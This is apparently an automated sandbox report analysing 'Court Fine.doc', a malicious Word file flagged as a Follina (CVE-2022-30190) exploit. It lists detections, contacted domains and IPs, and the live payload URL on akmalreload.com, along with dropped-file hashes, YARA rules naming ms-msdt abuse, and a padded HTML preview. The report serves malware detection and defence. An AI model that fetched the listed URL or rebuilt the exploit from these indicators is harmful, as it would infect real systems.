      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts13
      Exploitation for Client Execution      		Path InterceptionPath Interception1
      Masquerading      		OS Credential Dumping1
      File and Directory Discovery      		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory2
      System Information Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
      Non-Application Layer Protocol      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
      Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer2
      Ingress Tool Transfer      		SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Court Fine.doc41%VirustotalBrowse
      Court Fine.doc44%ReversingLabsDocument-Word.Trojan.Heuristic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      akmalreload.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://akmalreload.com/struk/wellcome.htmlyX0%Avira URL Cloudsafe
      https://akmalreload.com/struk/wellcome.html0%VirustotalBrowse
      https://akmalreload.com/struk/wellcome.html0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      akmalreload.com
      		104.21.73.122
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://akmalreload.com/struk/wellcome.htmltrue
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://akmalreload.com/struk/wellcome.htmlyX~WRF{697ED1F7-F1B9-4514-A3EE-C4B3306C8B08}.tmp.0.drfalse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      104.21.73.122
      		akmalreload.comUnited States
      		13335CLOUDFLARENETUStrue
      172.67.190.5
      		unknownUnited States
      		13335CLOUDFLARENETUSfalse

      General Information

      Joe Sandbox Version:35.0.0 Citrine
      Analysis ID:671073
      Start date and time: 21/07/202214:26:162022-07-21 14:26:16 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 9s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Court Fine.doc
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:8
      Number of new started drivers analysed:1
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.expl.evad.winDOC@1/18@15/2
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .doc
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer

      Warnings

      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
      • Report size getting too big, too many NtQueryAttributesFile calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      172.67.190.5rR9djVKgrg.exeGet hashmaliciousBrowse
      • nedu1994.xyz/

      Domains

      No context

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      CLOUDFLARENETUShttps://clicktime.cloud.postoffice.net/clicktime.php?U=https%3A%2F%2Fdorcusign.azurefd.net%2Fsignature%2F%23jkitchen%40woodlandsbank.com&E=jkitchen%40woodlandsbank.com&X=XID893AgTTDt7043Xd3&T=WDLP&HV=U,E,X,T&H=627f78cde031a170015aeccd45383eaab49ff001Get hashmaliciousBrowse
      • 104.17.25.14
      vVNaFawTJ9.exeGet hashmaliciousBrowse
      • 104.21.12.59
      http://barsugo.com/ckfinder/userfiles/files/gamapixejoxawifom.pdfGet hashmaliciousBrowse
      • 104.16.143.212
      FANCourier_RO_46674388484X5WCqDqiGRAe.exeGet hashmaliciousBrowse
      • 188.114.96.3
      https://contemporarystaffing.com/Get hashmaliciousBrowse
      • 104.26.9.183
      DHL Shipment Receipt.exeGet hashmaliciousBrowse
      • 188.114.97.9
      matthewr Invoice pdf.htmlGet hashmaliciousBrowse
      • 104.17.24.14
      DHL-21-2022.pdf.exeGet hashmaliciousBrowse
      • 172.67.154.72
      http://267742.cobirosite.comGet hashmaliciousBrowse
      • 172.67.223.147
      http://mayrfge-s38-dd33od02p-leops.moly.cloudGet hashmaliciousBrowse
      • 188.114.96.3
      Bileddet.exeGet hashmaliciousBrowse
      • 104.21.13.247
      mAgMRXeHnV.dllGet hashmaliciousBrowse
      • 104.17.244.81
      giXSx7co4Z.dllGet hashmaliciousBrowse
      • 104.17.244.81
      u25HmIWOKl.dllGet hashmaliciousBrowse
      • 104.17.244.81
      JnqM1TFtYi.dllGet hashmaliciousBrowse
      • 104.17.244.81
      7Qu8thR7WW.dllGet hashmaliciousBrowse
      • 104.17.244.81
      Kq8sxCCgnb.dllGet hashmaliciousBrowse
      • 104.17.244.81
      5hHHsExlwx.dllGet hashmaliciousBrowse
      • 104.17.244.81
      IlpKomTIie.dllGet hashmaliciousBrowse
      • 104.17.244.81
      NXE94LoM7v.dllGet hashmaliciousBrowse
      • 104.17.244.81
      CLOUDFLARENETUShttps://clicktime.cloud.postoffice.net/clicktime.php?U=https%3A%2F%2Fdorcusign.azurefd.net%2Fsignature%2F%23jkitchen%40woodlandsbank.com&E=jkitchen%40woodlandsbank.com&X=XID893AgTTDt7043Xd3&T=WDLP&HV=U,E,X,T&H=627f78cde031a170015aeccd45383eaab49ff001Get hashmaliciousBrowse
      • 104.17.25.14
      vVNaFawTJ9.exeGet hashmaliciousBrowse
      • 104.21.12.59
      http://barsugo.com/ckfinder/userfiles/files/gamapixejoxawifom.pdfGet hashmaliciousBrowse
      • 104.16.143.212
      FANCourier_RO_46674388484X5WCqDqiGRAe.exeGet hashmaliciousBrowse
      • 188.114.96.3
      https://contemporarystaffing.com/Get hashmaliciousBrowse
      • 104.26.9.183
      DHL Shipment Receipt.exeGet hashmaliciousBrowse
      • 188.114.97.9
      matthewr Invoice pdf.htmlGet hashmaliciousBrowse
      • 104.17.24.14
      DHL-21-2022.pdf.exeGet hashmaliciousBrowse
      • 172.67.154.72
      http://267742.cobirosite.comGet hashmaliciousBrowse
      • 172.67.223.147
      http://mayrfge-s38-dd33od02p-leops.moly.cloudGet hashmaliciousBrowse
      • 188.114.96.3
      Bileddet.exeGet hashmaliciousBrowse
      • 104.21.13.247
      mAgMRXeHnV.dllGet hashmaliciousBrowse
      • 104.17.244.81
      giXSx7co4Z.dllGet hashmaliciousBrowse
      • 104.17.244.81
      u25HmIWOKl.dllGet hashmaliciousBrowse
      • 104.17.244.81
      JnqM1TFtYi.dllGet hashmaliciousBrowse
      • 104.17.244.81
      7Qu8thR7WW.dllGet hashmaliciousBrowse
      • 104.17.244.81
      Kq8sxCCgnb.dllGet hashmaliciousBrowse
      • 104.17.244.81
      5hHHsExlwx.dllGet hashmaliciousBrowse
      • 104.17.244.81
      IlpKomTIie.dllGet hashmaliciousBrowse
      • 104.17.244.81
      NXE94LoM7v.dllGet hashmaliciousBrowse
      • 104.17.244.81

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.VBA.Logan.3458.11956.xlsGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.11956.xlsGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.28836.xlsGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.9901.xlsGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.28836.xlsGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      Purchase order #44827.docxGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      PO-AM2207586.xlsxGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.3825.xlsGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.27204.xlsGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      payment details.ppamGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      Deposit Slip#19072022_07.ppamGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      Quotation.ppamGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      DOC104.docGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      Quotation.ppamGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      Inv-42092859-4.ppamGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      Iakovos-Peleties_CV.docxGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      71nkwnC9VZ.docGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      NONAME.docGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      Purchase_order.docxGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      SL40II 6548.5130c.xlsxGet hashmaliciousBrowse
      • 172.67.190.5
      • 104.21.73.122
      7dcce5b76c8b17472d024758970a406bRAV_AR065444649_DA_1_P_4.xlsmGet hashmaliciousBrowse
      • 104.21.73.122
      Order Payment.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      Orden de Compras.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.11956.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.11956.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      RAV_AR068239023_DA_1_A_5.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.28836.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.9901.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.28836.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      Purchase order #44827.docxGet hashmaliciousBrowse
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.3825.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      SecuriteInfo.com.VBA.Logan.3458.27204.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      Updated Inv.xlsxGet hashmaliciousBrowse
      • 104.21.73.122
      recibo_formato.xlsGet hashmaliciousBrowse
      • 104.21.73.122
      RAV_AR016515656_DA_1_A_5.xlsmGet hashmaliciousBrowse
      • 104.21.73.122
      RAV_AR036276963_DA_1_A_5.xlsmGet hashmaliciousBrowse
      • 104.21.73.122
      payment details.ppamGet hashmaliciousBrowse
      • 104.21.73.122
      Deposit Slip#19072022_07.ppamGet hashmaliciousBrowse
      • 104.21.73.122
      Quotation.ppamGet hashmaliciousBrowse
      • 104.21.73.122
      recibo_formato.xlsGet hashmaliciousBrowse
      • 104.21.73.122

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28680685008290585
      Encrypted:false
      SSDEEP:96:KZ2LRN7+j8PoT4oVs6YoiHsca03UcEPbeWu0+yCq/beWu0+yCqpH:3pj8W1Y
      MD5:4E7A6E2EA5D20A17520E2B174699A2AF
      SHA1:92EDDDC249D635F883598B8829FBEB5D525B1542
      SHA-256:12D1183176F18527A8DBF551F2AC0D813D9B59C71464A14166989617EEEEA7E1
      SHA-512:84DB899119699FB494E67985E3606C625D8D11F3D7E70BAB66DD3353E999E2D17439DA89B99E1CB0FEB97AAE021ED184BA382097B24B6C7A5FA79C6BFF666D6E
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z.._.J..E.....]S,...X.F...Fa.q..............................s..+'H..fa.Fq.........../T...E.0..p@...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{F2F9B79C-A4CE-402A-8C23-897F2BBCD3F2}.FSD

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.6723577593694318
      Encrypted:false
      SSDEEP:96:KGZCyp6MqS9NoGw7eGr8VnZoZQs2w1w265s2w1w2ccds2w1w2O4s2w1wO:bpqGq85Z9/8S5/8EI/8F/8
      MD5:2D322C965F678443E0810A73B98142C2
      SHA1:D3CADC4E4289F085BF7C193F565EF2FD94D7793D
      SHA-256:169686FC24AB7EA61A28A4291B27E4B1F1021B8DBF9F89C6210F5521D62EDF4F
      SHA-512:CDCC216BBBE917CB3F7DE7274BD84049107D32837F1F9A11B2E2FC765C76DD14EFB879225FDA011F6C93412605D96B89EFFE17AB2E2FE3EDFF2D7F5F7E67338D
      Malicious:false
      Reputation:low
      Preview:......M.eFy...zA...A.E.:..s..S,...X.F...Fa.q..............................y..(.L...\..;r........Wfbkj?.J......b..S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.9025444484757976
      Encrypted:false
      SSDEEP:3:yVlgsRlzTInlb0rDSgWRP3sJ1WTlS5tfal276:yPblzElb0rPWObWTIy22
      MD5:98F3F4788D3C837E74311C16E9F69646
      SHA1:0B7F5E8E354353A4D9A36729A5DC156C8427EC2E
      SHA-256:EFFC23B2C2BA256BD21C16AC1DCE84A38CC251B828BC4F3E03A8BCDA97859AD4
      SHA-512:2B25ABDC2A01418DC2678742D5C7046FCC05BC1AA3FAFC2236DC8EE05116A03D6BF6D0F0281D3CB1EEEFA76F373458368DC6896F7135B558E76D023301DC8160
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.F.2.F.9.B.7.9.C.-.A.4.C.E.-.4.0.2.A.-.8.C.2.3.-.8.9.7.F.2.B.B.C.D.3.F.2.}...F.S.D..

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28734608648642523
      Encrypted:false
      SSDEEP:48:I3iRBqCR0Vf2d4TN1AgBCKgMlorUQJxZYgDAtnf3YtugDAtnf3Yt0H:KiLKKVCH
      MD5:653978AE7654C508539081FA8C191C65
      SHA1:DFEF43A940A091A0D22507E2E48098ECCDE5E2CB
      SHA-256:5FAC531854AAF6B30ECEAFD3AC2EFBED715C9DCF61DAC0D1784937EAB50BD753
      SHA-512:3500E53714F2506D8D37C40DE4B54622CF1AE3149D58E316C82926205BFC9C9BC3935D48DC51DE2493BC68C48E9D2C986B113F0C2BFE616CD89A0A9AC7573719
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z+.%`...M.=..}...S,...X.F...Fa.q............................O+Krn.ZD.%..%F.........0.,...?I...e^.6..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{2EF4E38E-0991-4992-A481-93278A415998}.FSD

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.22040206507032212
      Encrypted:false
      SSDEEP:48:I3N2UrBM49XHt9Z84L1jeMKvuvAfXla7XQs4ZUZC:KN2CMEG4BiMKvu4fX07XQs4ZUZC
      MD5:B854761AA5AA50445BDEC0CE4823FF81
      SHA1:1D3DD7A6B640B67BC8DC670FB454774D49B9783F
      SHA-256:BDE16CA49E63781E842EB52CE49EDE98605570CED28A88368088E5FCB9B27B7F
      SHA-512:DB4B0D4A7BD577BDB14268F5E388BA26DF8809E6AC9613278185BB2C900DD1F75736ACB3DB300EBD3E85A20F09D1817AB539474093B36775723BFC7DE12DC1C9
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z.'Oq...A..N.o./S,...X.F...Fa.q.............................s.N.l.A.D...J..........U^F...J.!...U.,P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.891255356565245
      Encrypted:false
      SSDEEP:3:yVlgsRlzwzdOkRfXWkLlnbUZdlwKQfmf276:yPblz4NhoZcW22
      MD5:953577F7C4042A246CB32B7057ABFDD4
      SHA1:DDD4DE7B9BB66A60FE7DA2B8DF8DA9F207DC21F0
      SHA-256:4A035E642431CCB2DD0A39F4FCEC739A5EA4ADD19C205D93976B96AB7769069A
      SHA-512:FF20EFDC228F237275C7696982E7E6A13EBB2E010BD9F091CD5EFA2AE8BC1F0AF81E0ADC27DDC55F709CBDAE83F4A2D0B83DF093258D85B1E1A0C60AFA71FEF7
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.2.E.F.4.E.3.8.E.-.0.9.9.1.-.4.9.9.2.-.A.4.8.1.-.9.3.2.7.8.A.4.1.5.9.9.8.}...F.S.D..

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htm

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:downloaded
      Size (bytes):7275
      Entropy (8bit):5.573158632495138
      Encrypted:false
      SSDEEP:48:Ye+xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ68:vUP+miLSAwD
      MD5:CDD33FFA502CBFFEC6E64C4574846A89
      SHA1:4E57B2D731513551B26F684B3D2871EB0F8CC14D
      SHA-256:5C632292394979EBF07B47CC5F9DD62A04C53CFF3F6C85FA26D259612D010F75
      SHA-512:1A780ACF25E4B765BEB5FD34A587BBDD5991344BB0E075989192327C48EBD345BF9BD194CDF1BD0D5F13DCBB2E3BE035AB59283685D3FB3DC186B264EC6375BB
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htm, Author: Joe Security
      Reputation:low
      IE Cache URL:https://akmalreload.com/struk/wellcome.html
      Preview:.<!doctype html>.<html lang="en">.<body>.<script>.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJ

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31E8062F.htm

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:dropped
      Size (bytes):7275
      Entropy (8bit):5.573158632495138
      Encrypted:false
      SSDEEP:48:Ye+xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ68:vUP+miLSAwD
      MD5:CDD33FFA502CBFFEC6E64C4574846A89
      SHA1:4E57B2D731513551B26F684B3D2871EB0F8CC14D
